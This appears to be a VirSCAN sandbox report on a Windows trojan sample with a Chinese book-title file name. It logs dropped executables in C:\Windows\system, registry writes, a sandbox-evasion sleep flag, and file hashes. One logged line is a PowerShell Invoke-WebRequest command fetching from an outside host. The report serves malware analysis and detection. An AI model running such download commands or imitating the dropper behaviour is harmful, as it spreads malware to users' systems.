VirSCAN VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, Aplikace VirSCAN může skenovat komprimované soubory s heslem 'infected'nebo'virus'.
4, If your browser cannot upload files, please download VirSCAN uploader to upload.

Language
Server load
Server Load
VirSCAN
VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, Aplikace VirSCAN může skenovat komprimované soubory s heslem 'infected'nebo'virus'.

Basic Information

file name: 00红星照耀中国
file size: 1826921
file type: application/x-dosexec
MD5: a30857d70249243b7faeb9a1d831145e
sha1: a020a89a47015d0309b51b3433d2b98b05228b4a

 CreateProcess

ApplicationName:
CmdLine: powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
childid: 3016
childname: powershell.exe
childpath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
drop_type:
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\xHHrwsJ.exe
childid: 2928
childname: xHHrwsJ.exe
childpath: C:\Windows\system\xHHrwsJ.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\UfmkLek.exe
childid: 2000
childname: UfmkLek.exe
childpath: C:\Windows\system\UfmkLek.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\MaprHdx.exe
childid: 2208
childname: MaprHdx.exe
childpath: C:\Windows\system\MaprHdx.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\JPzdVyd.exe
childid: 940
childname: JPzdVyd.exe
childpath: C:\Windows\system\JPzdVyd.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\KdggEVI.exe
childid: 2528
childname: KdggEVI.exe
childpath: C:\Windows\system\KdggEVI.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\VwdfFJt.exe
childid: 952
childname: VwdfFJt.exe
childpath: C:\Windows\system\VwdfFJt.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\CRcNZVo.exe
childid: 2596
childname: CRcNZVo.exe
childpath: C:\Windows\system\CRcNZVo.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\IXUptjB.exe
childid: 568
childname: IXUptjB.exe
childpath: C:\Windows\system\IXUptjB.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\pIzHgOO.exe
childid: 3024
childname: pIzHgOO.exe
childpath: C:\Windows\system\pIzHgOO.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\uMjqrEB.exe
childid: 3044
childname: uMjqrEB.exe
childpath: C:\Windows\system\uMjqrEB.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\sEgtnBe.exe
childid: 1876
childname: sEgtnBe.exe
childpath: C:\Windows\system\sEgtnBe.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\yZCFVGB.exe
childid: 2888
childname: yZCFVGB.exe
childpath: C:\Windows\system\yZCFVGB.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\ExdKeaE.exe
childid: 2200
childname: ExdKeaE.exe
childpath: C:\Windows\system\ExdKeaE.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\bcPoyuc.exe
childid: 256
childname: bcPoyuc.exe
childpath: C:\Windows\system\bcPoyuc.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\iBJwesG.exe
childid: 1964
childname: iBJwesG.exe
childpath: C:\Windows\system\iBJwesG.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\MOSoBow.exe
childid: 2892
childname: MOSoBow.exe
childpath: C:\Windows\system\MOSoBow.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\IhAbDZN.exe
childid: 2204
childname: IhAbDZN.exe
childpath: C:\Windows\system\IhAbDZN.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\tBgBbnQ.exe
childid: 1512
childname: tBgBbnQ.exe
childpath: C:\Windows\system\tBgBbnQ.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\HvsZicl.exe
childid: 2868
childname: HvsZicl.exe
childpath: C:\Windows\system\HvsZicl.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\iQKkOox.exe
childid: 2808
childname: iQKkOox.exe
childpath: C:\Windows\system\iQKkOox.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\XEOFqKg.exe
childid: 676
childname: XEOFqKg.exe
childpath: C:\Windows\system\XEOFqKg.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\NJPyHCi.exe
childid: 2592
childname: NJPyHCi.exe
childpath: C:\Windows\system\NJPyHCi.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\gfRmnmy.exe
childid: 1932
childname: gfRmnmy.exe
childpath: C:\Windows\system\gfRmnmy.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\CAMmSlI.exe
childid: 3052
childname: CAMmSlI.exe
childpath: C:\Windows\system\CAMmSlI.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\pdXNVaf.exe
childid: 2732
childname: pdXNVaf.exe
childpath: C:\Windows\system\pdXNVaf.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\tSxAjyb.exe
childid: 2552
childname: tSxAjyb.exe
childpath: C:\Windows\system\tSxAjyb.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine:
childid: 1316
childname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
childpath: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
drop_type:
name:
noNeedLine:
path:
pid: 2880

 Summary

buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList

 Behavior_analysis

message: 企图通过长时间休眠躲避沙箱检测
name: 长时间休眠
szSubkey:
score: 2

 Dropped_Save

analysis_result: 安全
create: 0
how: move
md5: 32f22388bd9ac27fe3221fd005f7f1bd
name: 590aee7bdd69b59b.customDestinations-ms
new_size: 7960bytes
operation: 拷贝覆盖文件
path: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
processid: 3016
processname: powershell.exe
sha1: dbaf27ce87620638a1211457ba71c6ae3cfb90f2
sha256: 02c356d71431699d769ab2d6d319682077a6b2e4318bdf3bfb32d29bbbb9d6d1
size: 7960
this_path: /data/cuckoo/storage/analyses/6000053/files/1016/590aee7bdd69b59b.customDestinations-ms
type: data

 Dropped Unsave

analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 2f1eabe32e9fc5c5aafd07fc8d5a19fe
name: xHHrwsJ.exe
new_size: 1784KB (1826921bytes)
operation: 修改文件
path: C:\Windows\system\xHHrwsJ.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 50d6c88e10f53d2aad303da9c289e9fb0b8bd0a0
sha256: b755bf757157b624ebf6ff20c0f7c5bbf7c505d682b6ed4dc943a7d689c554a6
size: 1826921
this_path: /data/cuckoo/storage/analyses/6000053/files/1000/xHHrwsJ.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 0705e683b880a4b0fbc2d07299308381
name: UfmkLek.exe
new_size: 1784KB (1827174bytes)
operation: 修改文件
path: C:\Windows\system\UfmkLek.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 2aebd67e833c2ca39dd53e9a4a5e2bf9b3ac344d
sha256: 4bfba276d9602ecf479a26555b766fc8c8f9e5e089ba236aab373819c495301a
